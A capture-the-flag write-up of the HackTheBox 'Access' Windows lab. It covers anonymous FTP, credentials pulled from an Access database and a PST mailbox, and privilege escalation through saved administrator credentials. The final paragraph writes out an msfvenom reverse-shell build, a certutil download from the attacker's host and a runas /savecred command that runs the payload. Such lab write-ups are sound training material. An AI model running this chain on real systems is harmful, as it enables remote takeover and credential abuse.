Access @ HackTheBox
In this short writeup I will show how I completed Access on hackthebox.eu, a quite easy windows box that involves parsing credentials from ms office files, converting mail formats and accessing saved windows credentials.
User Flag
The initial scan shows the following results:
1
2
3
4
5
6
7
8
9
10
11
12
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
FTP can be accessed anonymously and allows to download 2 files, Backups\backup.mdb
and Engineer\Access Control.zip
. The zip file is protected with a password so the first thing I look at is the mdb file. There are some tools like mdb-tools that can parse so mdb format just fine but I decided that a quick string search with strings -n12
might be enough:
1
2
3
4
5
6
...
admin
backup_admin
engineer
access4u@security
...
This looks like username, password or mail address. Since we just found potential passwords we try them on the archive and access4u@security
finally allows to unpack it. From the archive the file Access Control.pst
is obtained, which is a file format for mails used by Microsoft. With readpst 'Access Control.pst' && cat 'Access Control.mbox
I convert it to the mbox format to make it readable and find another password inside:
1
2
3
...
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.
...
With these credentials it is possible to telnet into the box as user security and read the user flag.
1
C:\Users\security\Desktop>type user.txt
Root Flag
Doing the usual enumeration I eventually check for stored credentials with cmdkey /list
which shows that there are indeed stored ones for the administrator user:
1
2
3
4
5
6
7
C:\Users\security>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
To get a root shell I generate a simple meterpreter reverse shell with msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.219 LPORT=5555 -f exe > xct.exe
, download it with certutil certutil.exe -urlcache -split -f http://10.10.14.219:8000/xct.exe xct.exe
and execute it with runas runas /user:administrator /savecred "xct.exe"
, which results in a root shell.